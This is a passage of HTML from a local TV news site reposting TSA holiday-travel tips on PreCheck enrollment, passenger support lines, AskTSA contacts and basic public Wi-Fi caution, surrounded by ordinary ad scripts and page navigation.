<li><strong>Become a Trusted Traveler.</strong> The TSA PreCheck program offers expedited security screening at the airport, connecting low-risk passengers with a more efficient air travel experience. Just in time for the holidays, the <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDYsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3VybGRlZmVuc2UudXMvdjMvX19odHRwczovbG5rcy5nZC9sL2V5SmhiR2NpT2lKSVV6STFOaUo5LmV5SmlkV3hzWlhScGJsOXNhVzVyWDJsa0lqb3hNRGNzSW5WeWFTSTZJbUp3TWpwamJHbGpheUlzSW1KMWJHeGxkR2x1WDJsa0lqb2lNakF5TWpFeE1UY3VOalk0TWpJeE9ERWlMQ0oxY213aU9pSm9kSFJ3Y3pvdkwzZDNkeTUwYzJFdVoyOTJMMjVsZDNNdmNISmxjM012Y21Wc1pXRnpaWE12TWpBeU1pOHhNUzh3TkM5MGMyRXRjbVZrZFdObGN5MTBjMkV0Y0hKbFkyaGxZMnR5TFdWdWNtOXNiRzFsYm5RdFptVmxJbjAuaTZ6dlBxcTFKY2hEWFhUamlhMVd3Z25JcmFkZFRObXBuZEJpNloxSHd4SS9zLzI4OTAxMTgxMTAvYnIvMTQ4NDE4MjQzNTkwLWxfXzshIUJDbFJ1T1Y1Y3Z0YnVOSSFTSjd3UkkxX3Q3UW12bEhMUWdFRjNiUHA5OHBoR2UtcGRVMVVmbGlTbGFSUUxXRWVNWWJ0VTF2YVVrbU9ULVFUWFRZdUxRckwlMjQifQ.VggqjaNEpq_QHIwScu_x6loetHDDdT5NU8Hh_Sr5Egk/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="6">enrollment </a>fee dropped from $85 to $78 for a five-year membership. <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDcsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3VybGRlZmVuc2UudXMvdjMvX19odHRwczovbG5rcy5nZC9sL2V5SmhiR2NpT2lKSVV6STFOaUo5LmV5SmlkV3hzWlhScGJsOXNhVzVyWDJsa0lqb3hNRGdzSW5WeWFTSTZJbUp3TWpwamJHbGpheUlzSW1KMWJHeGxkR2x1WDJsa0lqb2lNakF5TWpFeE1UY3VOalk0TWpJeE9ERWlMQ0oxY213aU9pSm9kSFJ3Y3pvdkwzZDNkeTUwYzJFdVoyOTJMM0J5WldOb1pXTnJJbjAuamh4MksxNkZMSERzNjh1d2FyYk1MR05lYjU5S3BKcTduZnpCV1lzWUVZQS9zLzI4OTAxMTgxMTAvYnIvMTQ4NDE4MjQzNTkwLWxfXzshIUJDbFJ1T1Y1Y3Z0YnVOSSFTSjd3UkkxX3Q3UW12bEhMUWdFRjNiUHA5OHBoR2UtcGRVMVVmbGlTbGFSUUxXRWVNWWJ0VTF2YVVrbU9ULVFUWFlhQU8wZ0klMjQifQ.h3-srZuuaJn6QcgqReihwfhsxXXzkPDSx-ZdHPj5vcg/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="7">Online renewals</a> cost just $70. TSA PreCheck members keep their shoes, belts, and light jackets on and their laptops and liquids in their carry-on bags. Program member benefits include less physical contact, fewer items on the conveyor belt, and faster screening. In addition, many new enrollees receive a known traveler number within three to five days.</li>
</ol>
<ol start="6">
<li><strong>Request passenger support.</strong> Travelers or families of passengers with disabilities and medical conditions may call the <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDgsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3VybGRlZmVuc2UudXMvdjMvX19odHRwczovbG5rcy5nZC9sL2V5SmhiR2NpT2lKSVV6STFOaUo5LmV5SmlkV3hzWlhScGJsOXNhVzVyWDJsa0lqb3hNRGtzSW5WeWFTSTZJbUp3TWpwamJHbGpheUlzSW1KMWJHeGxkR2x1WDJsa0lqb2lNakF5TWpFeE1UY3VOalk0TWpJeE9ERWlMQ0oxY213aU9pSm9kSFJ3Y3pvdkwzZDNkeTUwYzJFdVoyOTJMM1J5WVhabGJDOXdZWE56Wlc1blpYSXRjM1Z3Y0c5eWRDSjkuMDNESURua29ncm1vRVFOc3Z1YlMzX1JVVjQ5OEgxdUZBZUxYVHVUQmUyay9zLzI4OTAxMTgxMTAvYnIvMTQ4NDE4MjQzNTkwLWxfXzshIUJDbFJ1T1Y1Y3Z0YnVOSSFTSjd3UkkxX3Q3UW12bEhMUWdFRjNiUHA5OHBoR2UtcGRVMVVmbGlTbGFSUUxXRWVNWWJ0VTF2YVVrbU9ULVFUWGRXTUZBWmclMjQifQ.NtDfdyIaEeChL1mkqcZbPfdKVDpPp7Ac-7GX99NS7EM/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="8">TSA Cares</a> helpline toll-free at 855-787-2227 at least 72 hours before travel with any questions about screening procedures and find out what to expect at the security checkpoint. TSA Cares also arranges assistance at the checkpoint for travelers with specific needs.</li>
</ol>
<ol start="7">
<li><strong>@AskTSA</strong>. Travelers can get assistance in real-time by submitting their questions and comments to <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDksInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3R3aXR0ZXIuY29tL0Fza1RTQSJ9.rzd_NwtHpfCY-GaD516FLHqwqzsx-hijXK1CfpiXWQY/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="9">@AskTSA</a> on Twitter, Facebook Messenger, and via text message using any mobile device to “AskTSA” (275-872). An automated virtual assistant is available 24/7, while the staff is available daily from 8 a.m. to 6 p.m. EST, including holidays and weekends. Travelers may also reach the TSA Contact Center at 866-289-9673. Staff is available from 8 a.m. to 11 p.m. on weekdays and 9 a.m. to 8 p.m. on weekends/holidays, and an automated service is available 24 hours a day, seven days a week.</li>
</ol>
<ol start="8">
<li><strong>If You See Something. Say Something®.</strong> Public awareness remains a critical element of transportation security, and we all play a role in keeping our communities safe. For additional information, please visit the DHS <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMTAsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3VybGRlZmVuc2UudXMvdjMvX19odHRwczovbG5rcy5nZC9sL2V5SmhiR2NpT2lKSVV6STFOaUo5LmV5SmlkV3hzWlhScGJsOXNhVzVyWDJsa0lqb3hNVEFzSW5WeWFTSTZJbUp3TWpwamJHbGpheUlzSW1KMWJHeGxkR2x1WDJsa0lqb2lNakF5TWpFeE1UY3VOalk0TWpJeE9ERWlMQ0oxY213aU9pSm9kSFJ3Y3pvdkwzZDNkeTVrYUhNdVoyOTJMM05sWlMxemIyMWxkR2hwYm1jdGMyRjVMWE52YldWMGFHbHVaeUo5LkJybTF1b3FRZU5oWVlVQk1wVjhEZGJMTWhtamxJTncyeVBHUTFmaFRfRGsvcy8yODkwMTE4MTEwL2JyLzE0ODQxODI0MzU5MC1sX187ISFCQ2xSdU9WNWN2dGJ1TkkhU0o3d1JJMV90N1FtdmxITFFnRUYzYlBwOThwaEdlLXBkVTFVZmxpU2xhUlFMV0VlTVlidFUxdmFVa21PVC1RVFhYWFd0U2VvJTI0In0._No82VJEoAcqm8TxMF-UlCjeBKX1omQuRLtqUPoXwUo/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="10">website</a>.</li>
</ol>
<ol start="9">
<li><strong>Practice good cybersecurity habits.</strong> Effective cybersecurity habits are not limited to the home or office. Those traveling – whether domestically or internationally – should continue practicing safe online behaviors. Take proactive steps to secure internet-enabled devices. For example, practice the concept of stop, think and connect before connecting to any public wireless hotspot, such as airports, hotels, and cafés. For more cybersecurity tips, visit <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMTEsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwOi8vd3d3LmNpc2EuZ292LyJ9.WzVxBND-YOaKjMKqFrx-v4vJ0n0GVIlkehB-mBqjYVM/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="11">cisa.gov</a>.</li>
</ol>
<ol start="10">
<li><strong>Show gratitude to frontline workers.</strong> Thank a TSO, a flight attendant, a gate agent, or someone who serves at the front of transportation. TSOs complete about 200 hours of certification training and are committed to transportation security while ensuring all travelers are treated with respect and courtesy. Pack an extra dose of patience, especially during higher passenger volume travel days, and show gratitude to those working diligently to get everyone to their destinations safely.</li>
</ol>
<p>TSA also has videos for parents and families to watch with young children. The latest <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDEsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PW1XMlZIa3dvZFNzIn0.WoRJaBq7hbGjCH1FWKeNoyQYF4NAye0rXcSbnJtbMhM/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="1">edition </a>in the “TSA KIDS” series is for families traveling with gifts.</p>
<p><a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDIsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3d3dy55b3V0dWJlLmNvbS9jL3RzYS92aWRlb3MifQ.YomeoqywF0MkYtnnEBz1II1XZb5l1NUhORSHoos8Ak0/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="2">TSA KIDS</a> videos cover various travel tips, including traveling with snacks and traveling with electronics.</p>
<p>More information on the TSA KIDS video is available on their <a href="https://lnks.gd/l/eyJhbGciOiJIUzI1NiJ9.eyJidWxsZXRpbl9saW5rX2lkIjoxMDMsInVyaSI6ImJwMjpjbGljayIsImJ1bGxldGluX2lkIjoiMjAyMjEyMTkuNjg1MDUxMjEiLCJ1cmwiOiJodHRwczovL3d3dy55b3V0dWJlLmNvbS9jL3RzYS92aWRlb3MifQ.WzvZpLx8ZekTrKJ-3IhrjEw6-eJW5hhQa87BwaKLN9k/s/980049600/br/150854175277-l" target="_blank" rel="noopener noreferrer" data-auth="NotApplicable" data-safelink="true" data-linkindex="3">YouTube page</a>.</p>
<p>To provide a higher level of assistance for travelers with questions about airport security screening procedures, airline passengers can send a text using any mobile device to “AskTSA” (275-872).</p>
<p>A virtual assistant is available 24 hours a day, 365 days a year.</p>
<p>AskTSA staff are available daily from 8 a.m. to 6 p.m. EST for more complicated questions. Passengers may still reach out to AskTSA (@AskTSA) on Twitter or Facebook Messenger with questions and comments.</p>

<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_bottom tdi_55 td_block_template_1 ">

<style>
/* custom css */
.tdi_55.td-a-rec{
					text-align: center;
				}.tdi_55 .td-element-style{
					z-index: -1;
				}.tdi_55.td-a-rec-img{
				    text-align: left;
				}.tdi_55.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_55.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><script type="text/javascript">
var td_screen_width = window.innerWidth;
window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1140 ) {
			        
			        /* large monitors */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:580px;height:400px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "7163548926");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 1019  && td_screen_width < 1140 ) {
			    
			        /* landscape tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:468px;height:60px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "7163548926");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width >= 768  && td_screen_width < 1019 ) {
			    
			        /* portrait tablets */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:468px;height:60px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "7163548926");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});window.addEventListener("load", function(){            
	            var placeAdEl = document.getElementById("td-ad-placeholder");
			    if ( null !== placeAdEl && td_screen_width < 768 ) {
			    
			        /* Phones */
			        var adEl = document.createElement("ins");
		            placeAdEl.replaceWith(adEl);	
		            adEl.setAttribute("class", "adsbygoogle");
		            adEl.setAttribute("style", "display:inline-block;width:300px;height:1050px");	            		                
		            adEl.setAttribute("data-ad-client", "ca-pub-7033249135551504");
		            adEl.setAttribute("data-ad-slot", "7163548926");	            
			        (adsbygoogle = window.adsbygoogle || []).push({});
			    }
			});</script>
<span class="td-adspot-title">Sponsored Content</span><noscript id="td-ad-placeholder"></noscript></div>

 <!-- end A --> 

        </div>

        <footer>
            <!-- post pagination -->            <!-- review -->
            <div class="td-post-source-tags">
                <!-- source via -->                <!-- tags -->            </div>

            <div class="td-post-sharing-bottom"><div id="td_social_sharing_article_bottom" class="td-post-sharing td-ps-bg td-ps-notext td-ps-bar td-post-sharing-style5 "><div class="td-post-sharing-visible"><div class="td-social-sharing-button td-social-sharing-button-js td-social-handler td-social-share-text">
                                        <div class="td-social-but-icon"><i class="td-icon-share"></i></div>
                                        <div class="td-social-but-text">Share</div>
                                    </div><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwoay.com%2Ftsa-prepared-for-winter-holiday-travelers%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=TSA+prepared+for+winter+holiday+travelers&url=https%3A%2F%2Fwoay.com%2Ftsa-prepared-for-winter-holiday-travelers%2F&via=WOAY-TV" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-print" href="#" title="Print" ><div class="td-social-but-icon"><i class="td-icon-print"></i></div><div class="td-social-but-text">Print</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-mail" href="mailto:?subject=TSA prepared for winter holiday travelers&body=https://woay.com/tsa-prepared-for-winter-holiday-travelers/" title="Email" ><div class="td-social-but-icon"><i class="td-icon-mail"></i></div><div class="td-social-but-text">Email</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://woay.com/tsa-prepared-for-winter-holiday-travelers/&amp;media=https://woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg&description=TSA expects airport security checkpoints nationwide to be busier this holiday travel season than last year" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-reddit" href="https://reddit.com/submit?url=https://woay.com/tsa-prepared-for-winter-holiday-travelers/&title=TSA+prepared+for+winter+holiday+travelers" title="ReddIt" ><div class="td-social-but-icon"><i class="td-icon-reddit"></i></div><div class="td-social-but-text">ReddIt</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-viber" href="viber://forward?text=TSA+prepared+for+winter+holiday+travelers https://woay.com/tsa-prepared-for-winter-holiday-travelers/" title="Viber" ><div class="td-social-but-icon"><i class="td-icon-viber"></i></div><div class="td-social-but-text">Viber</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_bottom" title="More">
                                    <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
                                </a></div></div></div>            <!-- next prev -->            <!-- author box --><div class="author-box-wrap"><a href="https://woay.com/author/blawrencewoay/" aria-label="author-photo"><img data-del="avatar" src="https://i0.wp.com/woay.com/wp-content/uploads/2022/07/profile-picture.webp?fit=96%2C96&amp;ssl=1" class="avatar pp-user-avatar avatar-96 photo  jetpack-lazy-image" height="96" width="96" data-lazy-src="https://i0.wp.com/woay.com/wp-content/uploads/2022/07/profile-picture.webp?fit=96%2C96&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"><noscript><img data-lazy-fallback="1" data-del="avatar" src='https://i0.wp.com/woay.com/wp-content/uploads/2022/07/profile-picture.webp?fit=96%2C96&ssl=1' class='avatar pp-user-avatar avatar-96 photo ' height='96' width='96' /></noscript></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="https://woay.com/author/blawrencewoay/">Brandy Lawrence</a></span></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>            <!-- meta --><span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Brandy Lawrence"><meta itemprop="url" content="https://woay.com/author/blawrencewoay/"></span><meta itemprop="datePublished" content="2022-12-20T11:11:03-05:00"><meta itemprop="dateModified" content="2022-12-20T11:11:03-05:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://woay.com/tsa-prepared-for-winter-holiday-travelers/"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://woay.com/wp-content/uploads/2020/03/WOAY-272-X-90.png"></span><meta itemprop="name" content="WOAY-TV"></span><meta itemprop="headline " content="TSA prepared for winter holiday travelers"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://i0.wp.com/woay.com/wp-content/uploads/2022/10/11014L00-HHIFW.jpg?fit=1280%2C720&ssl=1"><meta itemprop="width" content="1280"><meta itemprop="height" content="720"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts tdi_56 td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_56" ><script>var block_tdi_56 = new tdBlock();
block_tdi_56.id = "tdi_56";
block_tdi_56.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"tdi_56","td_column_number":3,"block_type":"td_block_related_posts","live_filter_cur_post_id":108441,"live_filter_cur_post_author":"55","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_ajax_preloading":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","ajax_pagination_next_prev_swipe":"","border_top":"","css":"","tdc_css":"","tdc_css_class":"tdi_56","tdc_css_class_style":"tdi_56_rand_style"}';
block_tdi_56.td_column_number = "3";
block_tdi_56.block_type = "td_block_related_posts";
block_tdi_56.post_count = "3";
block_tdi_56.found_posts = "10144";
block_tdi_56.header_color = "";
block_tdi_56.ajax_pagination_infinite_stop = "";
block_tdi_56.max_num_pages = "3382";
tdBlocksArray.push(block_tdi_56);
</script><h4 class="td-related-title td-block-title"><a id="tdi_57" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="tdi_56" href="#">RELATED ARTICLES</a><a id="tdi_58" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="tdi_56" href="#">MORE FROM AUTHOR</a></h4><div id=tdi_56 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://woay.com/congress-moves-to-ban-tiktok-from-us-government-devices/" rel="bookmark" class="td-image-wrap " title="Congress moves to ban TikTok from US government devices" ><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x960_11217P00-FEAZJ.png?resize=218%2C150&ssl=1"  srcset="https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x960_11217P00-FEAZJ.png?resize=218%2C150&ssl=1 218w, https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x960_11217P00-FEAZJ.png?resize=100%2C70&ssl=1 100w, https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x960_11217P00-FEAZJ.png?zoom=2&resize=218%2C150&ssl=1 436w, https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x960_11217P00-FEAZJ.png?zoom=3&resize=218%2C150&ssl=1 654w" sizes="(max-width: 218px) 100vw, 218px"  alt="" title="Congress moves to ban TikTok from US government devices" /></a></div>                <a href="https://woay.com/news/national/" class="td-post-category">National</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://woay.com/congress-moves-to-ban-tiktok-from-us-government-devices/" rel="bookmark" title="Congress moves to ban TikTok from US government devices">Congress moves to ban TikTok from US government devices</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://woay.com/governor-justice-declares-extended-half-day-holidays-for-christmas-and-new-years-for-public-employees/" rel="bookmark" class="td-image-wrap " title="Governor Justice declares extended half day holidays for Christmas and New Year&#8217;s for public employees" ><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/woay.com/wp-content/uploads/2018/12/Holidays-generic-MGN_1479584064343_4923904_ver1.0_1280_720.jpg?resize=218%2C150&ssl=1"   alt="" title="Governor Justice declares extended half day holidays for Christmas and New Year&#8217;s for public employees" /></a></div>                <a href="https://woay.com/news/" class="td-post-category">News</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://woay.com/governor-justice-declares-extended-half-day-holidays-for-christmas-and-new-years-for-public-employees/" rel="bookmark" title="Governor Justice declares extended half day holidays for Christmas and New Year&#8217;s for public employees">Governor Justice declares extended half day holidays for Christmas and New Year&#8217;s for public employees</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://woay.com/wells-fargo-to-pay-3-7b-over-consumer-law-violations/" rel="bookmark" class="td-image-wrap " title="Wells Fargo to pay $3.7B over consumer law violations" ><img width="218" height="150" class="entry-thumb" src="https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x720_20610B00-DZNJN.png?resize=218%2C150&ssl=1"  srcset="https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x720_20610B00-DZNJN.png?resize=218%2C150&ssl=1 218w, https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x720_20610B00-DZNJN.png?resize=100%2C70&ssl=1 100w, https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x720_20610B00-DZNJN.png?zoom=2&resize=218%2C150&ssl=1 436w, https://i0.wp.com/woay.com/wp-content/uploads/2022/12/MGN_1280x720_20610B00-DZNJN.png?zoom=3&resize=218%2C150&ssl=1 654w" sizes="(max-width: 218px) 100vw, 218px"  alt="" title="Wells Fargo to pay $3.7B over consumer law violations" /></a></div>                <a href="https://woay.com/news/national/" class="td-post-category">National</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://woay.com/wells-fargo-to-pay-3-7b-over-consumer-law-violations/" rel="bookmark" title="Wells Fargo to pay $3.7B over consumer law violations">Wells Fargo to pay $3.7B over consumer law violations</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_56" data-td_block_id="tdi_56"><i class="td-next-prev-icon td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_56" data-td_block_id="tdi_56"><i class="td-next-prev-icon td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
                                </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside id="block-9" class="td_block_template_1 widget block-9 widget_block widget_media_image">
<figure class="wp-block-image size-large"><a href="https://woay.com/2022-election/"><img decoding="async" loading="lazy" width="1024" height="538" src="https://woay.com/wp-content/uploads/2022/11/2022-Election-share-1024x538.jpg" alt="" class="wp-image-107953" srcset="https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?resize=1024%2C538&amp;ssl=1 1024w, https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?resize=300%2C158&amp;ssl=1 300w, https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?resize=768%2C403&amp;ssl=1 768w, https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?resize=696%2C365&amp;ssl=1 696w, https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?resize=1068%2C561&amp;ssl=1 1068w, https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?resize=800%2C420&amp;ssl=1 800w, https://i0.wp.com/woay.com/wp-content/uploads/2022/11/2022-Election-share.jpg?w=1200&amp;ssl=1 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></figure>
</aside><aside id="custom_html-16" class="widget_text td_block_template_1 widget custom_html-16 widget_custom_html"><h4 class="block-title"><span>Current Conditions</span></h4><div class="textwidget custom-html-widget"><script type="text/javascript" src="https://widgets.media.weather.com/wxwidget.loader.js?cid=550806385"></script><p> <wx-widget type="current-conditions" latitude="37.7782" longitude="-81.1882" group="true" units="e" theme="blue"></wx-widget><wx-widget type="search" theme="blue"></wx-widget></p></div></aside><aside id="media_image-6" class="td_block_template_1 widget media_image-6 widget_media_image"><h4 class="block-title"><span>Weekly Giveaway</span></h4><a href="https://woay.com/2021giveaway/"><img width="300" height="168" src="https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?fit=300%2C168&amp;ssl=1" class="image wp-image-95801  attachment-medium size-medium jetpack-lazy-image" alt="" decoding="async" loading="lazy" style="max-width: 100%; height: auto;" data-lazy-srcset="https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?w=1530&amp;ssl=1 1530w, https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?resize=300%2C168&amp;ssl=1 300w, https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?resize=1024%2C572&amp;ssl=1 1024w, https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?resize=768%2C429&amp;ssl=1 768w, https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?resize=696%2C389&amp;ssl=1 696w, https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?resize=1068%2C597&amp;ssl=1 1068w, https://i0.wp.com/woay.com/wp-content/uploads/2021/02/ENTER-TO-WIN_AD-SIZE-1.jpg?resize=752%2C420&amp;ssl=1 752w, 